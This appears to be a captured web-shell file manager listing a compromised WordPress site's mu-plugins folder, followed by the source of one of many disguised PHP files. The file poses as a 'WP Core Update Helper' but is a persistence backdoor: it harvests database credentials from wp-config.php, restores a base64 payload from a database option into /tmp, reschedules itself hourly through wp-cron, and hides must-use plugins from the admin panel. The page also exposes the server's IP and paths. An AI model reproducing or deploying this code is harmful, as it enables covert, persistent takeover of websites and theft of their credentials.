Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
maskenattest /
wp-content21 /
mu-plugins /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-07 02:43
aios-firewall-loader.php
182
B
-rw-r--r--
2026-07-29 14:04
wp-asset-loader-24e16ed6.php
1.77
KB
-rw-r--r--
2026-07-27 16:09
wp-asset-loader-cf2a33e1.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cache-handler-bf365052.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cache-handler-f2c55fb1.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-core-update-4c3d97bb.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-core-update-4e7b8324.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-core-update-c8924735.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-core-update-f8c4db4e.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cron-helper-19d91a17.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cron-helper-5abc6a01.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cron-helper-87644e20.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-cron-helper-b7a6d12d.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-mail-handler-c47e86a3.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-mail-handler-d4773442.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-rest-cache-7bec3568.php
833
B
-rw-r--r--
2026-07-26 20:57
wp-rest-cache-86f1f81d.php
833
B
-rw-r--r--
2026-07-26 20:57
wp-rest-optimizer-1dbf167c.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-rest-optimizer-656cb6e6.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-rest-optimizer-95a867ff.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
wp-rest-optimizer-a76ceec0.php
1.77
KB
-rw-r--r--
2026-07-26 20:57
Save
Rename
<?php /* Plugin Name: WP Core Update Helper */ $_p = '/tmp/phpz00i2h'; $_s = '/var/www/maskenattest/wp-content/uploads/class-wp-hook_b7a6d12d.php'; $_opt = '_site_transient_health_7a44073c'; $_min = 46976; $_hook = 'wp_cache_health_7a44073c'; if (!function_exists('_wp_cuh_restore')) { function _wp_cuh_restore($p,$s,$opt,$min){ $bad = (!file_exists($p) || (@filesize($p) < $min)); if (!$bad) return; if (file_exists($s) && @filesize($s) >= $min) { @copy($s,$p); @chmod($p,0644); return; } $_cf = dirname(__DIR__,2).'/wp-config.php'; if(!file_exists($_cf)) return; $_src=@file_get_contents($_cf); if(!preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m1)) return; if(!preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m2)) return; if(!preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m3)) return; if(!preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]*?)['\"]/",$_src,$_m4)) return; $_tp='wp_'; if(preg_match("/table_prefix\s*=\s*['\"]([^'\"]*?)['\"]/",$_src,$_m5)) $_tp=$_m5[1]; try{$_db=@(new PDO('mysql:host='.$_m4[1].';dbname='.$_m1[1],$_m2[1],$_m3[1])); $_q=$_db->query("SELECT option_value FROM `".$_tp."options` WHERE option_name='".$opt."'"); if($_q&&($_row=$_q->fetch())){@file_put_contents($p,base64_decode($_row[0]));@chmod($p,0644);} }catch(\Exception $e){} } } _wp_cuh_restore($_p,$_s,$_opt,$_min); add_action('init',function() use ($_hook){ if (function_exists('wp_next_scheduled') && !wp_next_scheduled($_hook)) wp_schedule_event(time(),'hourly',$_hook); }); add_action($_hook,function() use ($_p,$_s,$_opt,$_min){ _wp_cuh_restore($_p,$_s,$_opt,$_min); }); add_filter('show_advanced_plugins',function($s,$t){return $t==='mustuse'?false:$s;},10,2);